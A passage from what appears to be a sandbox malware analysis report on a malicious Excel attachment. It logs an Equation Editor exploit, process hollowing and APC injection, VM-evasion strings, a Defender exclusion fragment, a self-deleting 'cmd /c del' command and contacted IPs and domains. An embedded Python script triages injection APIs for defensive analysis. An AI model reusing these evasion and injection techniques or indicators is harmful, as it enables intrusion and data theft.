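Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFFFC NtCreateProcessEx, 7_2_025FFFFC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFC30 NtOpenProcess, 7_2_025FFC30
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FFC90 NtUnmapViewOfSection, 7_2_025FFC90
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_02600078 NtResumeThread, 7_2_02600078
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_025FF900 NtReadFile,LdrInitializeThunk, 7_2_025FF900
"""

# "5_2_007A0078" is the sandbox's process index, analysis stage and address.
# Lines that carry no API name (address only) are skipped by the regex.
LINE_RE = re.compile(
    r"^Source: (?P<image>.+?) Code function: "
    r"(?P<proc>\d+)_(?P<stage>\d+)_(?P<addr>[0-9A-Fa-f]+) "
    r"(?P<apis>[A-Za-z][A-Za-z0-9_,]*?),? "
    r"\d+_\d+_[0-9A-Fa-f]+$"
)


def parse_code_functions(text):
    """Map (process index, image path) -> set of API names reached."""
    reached = defaultdict(set)
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # address-only lines, or unrelated report lines
        apis = {a for a in m.group("apis").split(",") if a}
        reached[(int(m.group("proc")), m.group("image"))] |= apis
    return dict(reached)


# API sets behind the injection primitives the report names. Presence in the
# disassembly shows the code path exists, not that it ran: the sandbox's own
# "process hollowing" / "queues an APC" verdicts come from observed behaviour.
HOLLOWING_CORE = {"NtUnmapViewOfSection", "NtSetContextThread", "NtResumeThread"}
REMOTE_WRITE = {"NtWriteVirtualMemory", "NtMapViewOfSection"}
REMOTE_HANDLE = {"NtOpenProcess", "NtCreateProcessEx"}


def injection_techniques(apis):
    """Name each injection primitive whose full API set a process reaches."""
    found = []
    if HOLLOWING_CORE <= apis and apis & REMOTE_WRITE:
        found.append("process_hollowing")
    if "NtQueueApcThread" in apis:
        found.append("apc_injection")
    if apis & REMOTE_HANDLE and apis & REMOTE_WRITE:
        found.append("remote_memory_write")
    return found


def triage(text):
    """Per process ('index:basename'), the injection primitives found."""
    return {
        f"{proc}:{ntpath.basename(image)}": injection_techniques(apis)
        for (proc, image), apis in parse_code_functions(text).items()
    }


if __name__ == "__main__":
    for proc, techniques in triage(REPORT_LINES).items():
        print(proc, techniques or "no injection primitives reached")
```

Run against the embedded lines, process 7 (cscript.exe) trips all three groupings while process 5 (vbc.exe) trips none: the vbc.exe listing in this report contains NtUnmapViewOfSection and NtResumeThread but not NtSetContextThread or NtWriteVirtualMemory, so this static check alone would not call it a hollowing process. That gap is the caveat to keep in mind when reading these listings: the disassembly coverage per stage is partial, and the behavioural signatures in the report are the stronger evidence.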
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: Vecchio debito_SKTGH_465585484754.xlsx Virustotal: Detection: 39%
Source: Vecchio debito_SKTGH_465585484754.xlsx ReversingLabs: Detection: 32%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Vecchio debito_SKTGH_465585484754.xlsx
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD8A2.tmp
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/20@4/4
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: explorer.exe, 00000006.00000000.491661834.0000000002AE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: .VBPud<_
Source: vbc[1].exe.2.dr, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: vbc.exe.2.dr, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.vbc.exe.ff0000.1.unpack, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.vbc.exe.ff0000.0.unpack, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.0.vbc.exe.ff0000.4.unpack, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.vbc.exe.ff0000.5.unpack, dz/yV.cs Cryptographic APIs: 'CreateDecryptor'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000005.00000002.511976922.0000000000790000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.477475563.00000000004A0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.514399498.0000000000910000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000003.478435499.0000000000600000.00000004.00000800.00020000.00000000.sdmp, cscript.exe
Source: Binary string: cscript.pdbN source: vbc.exe, 00000005.00000002.511936143.0000000000620000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000005.00000002.511770795.0000000000309000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CharUnicodeIn.pdb source: vbc.exe
Source: Binary string: cscript.pdb source: vbc.exe, 00000005.00000002.511936143.0000000000620000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000005.00000002.511770795.0000000000309000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Source: vbc[1].exe.2.dr, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc.exe.2.dr, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.vbc.exe.ff0000.1.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.ff0000.0.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.ff0000.4.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.2.vbc.exe.ff0000.5.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.ff0000.6.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.ff0000.2.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.ff0000.10.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.ff0000.3.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.ff0000.1.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.ff0000.0.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.ff0000.8.unpack, Ng/fa.cs .Net Code: pMn System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc[1].exe.2.dr, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: vbc.exe.2.dr, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 4.2.vbc.exe.ff0000.1.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 4.0.vbc.exe.ff0000.0.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.ff0000.4.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.2.vbc.exe.ff0000.5.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.ff0000.6.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.ff0000.2.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.ff0000.10.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.ff0000.3.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.ff0000.1.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.ff0000.0.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: 5.0.vbc.exe.ff0000.8.unpack, dz/yV.cs .Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B832 push eax; ret 5_2_0041B838
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B83B push eax; ret 5_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B8C9 push eax; ret 5_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B89C push eax; ret 5_2_0041B8A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041A14C push edx; iretd 5_2_0041A14D
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041A9F5 push ss; retf 5_2_0041A9F6
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C985 push 2E33947Ah; ret 5_2_0041CBEC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041526B push es; retf 5_2_00415281
Source: C:\Users\Public\vbc.exe Code function: 5_2_0040C30E pushad ; iretd 5_2_0040C30F
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CBED push 2E33947Ah; ret 5_2_0041CBEC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D466 push 80958155h; iretd 5_2_0041D477
Source: C:\Users\Public\vbc.exe Code function: 5_2_00415C32 push ecx; ret 5_2_00415C33
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B7E5 push eax; ret 5_2_0041B838
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0260DFA1 push ecx; ret 7_2_0260DFB4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008A14C push edx; iretd 7_2_0008A14D
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008526B push es; retf 7_2_00085281
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0007C30E pushad ; iretd 7_2_0007C30F
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008D466 push 80958155h; iretd 7_2_0008D477
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008B7E5 push eax; ret 7_2_0008B838
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008B83B push eax; ret 7_2_0008B8A2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008B832 push eax; ret 7_2_0008B838
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008B89C push eax; ret 7_2_0008B8A2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008B8C9 push eax; ret 7_2_0008B8A2
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008C985 push 2E33947Ah; ret 7_2_0008CBEC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_0008A9F5 push ss; retf 7_2_0008A9F6

Persistence and Installation Behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe

Boot Survival

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: Yara match File source: 4.2.vbc.exe.2564dd8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.2505e58.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1416, type: MEMORYSTR
Source: vbc.exe, 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.478639061.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 0000000000078614 second address: 000000000007861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cscript.exe RDTSC instruction interceptor: First address: 00000000000789AE second address: 00000000000789B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1424 Thread sleep time: -300000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 1812 Thread sleep time: -33348s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2636 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\cscript.exe TID: 2844 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\cscript.exe Last function: Thread delayed
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 33348
Source: vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000006.00000000.485876483.000000000457A000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0acpi\pnp0a05\5cacpi\pnp0a05\25pciide\idech7
Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.494078232.000000000456F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.493996125.00000000044E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.497464057.000000000029B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: vbc.exe, 00000004.00000002.478926747.0000000002550000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging

Source: C:\Users\Public\vbc.exe Code function: 5_2_004088E0 rdtsc 5_2_004088E0
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cscript.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\cscript.exe Code function: 7_2_026126F8 mov eax, dword ptr fs:[00000030h] 7_2_026126F8
Source: C:\Users\Public\vbc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\cscript.exe Process queried: DebugPort
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409B50 LdrLoadDll, 5_2_00409B50
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\explorer.exe Network Connect: 162.241.244.46 80
Source: C:\Windows\explorer.exe Network Connect: 206.188.192.2 80
Source: C:\Windows\explorer.exe Network Connect: 216.177.167.5 80
Source: C:\Windows\explorer.exe Domain query: www.laqueenbeautybar.supplies
Source: C:\Windows\explorer.exe Domain query: www.dairatwsl.com
Source: C:\Windows\explorer.exe Domain query: www.vacoveco.com
Source: C:\Windows\explorer.exe Domain query: www.hevenorfeed.com
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: ED0000
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\cscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\cscript.exe Thread register set: target process: 1764
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\SysWOW64\cscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\vbc.exe"
Source: explorer.exe, 00000006.00000000.497620507.0000000000750000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.479969960.0000000000255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.497620507.0000000000750000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.497620507.0000000000750000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection

Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.360cad0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.511693460.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.668980858.0000000000070000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669019561.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.511806943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.503199195.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.496910785.00000000097CB000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.470929460.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.477062967.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.669067975.00000000001D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.511894951.00000000005B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.479122518.00000000034C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY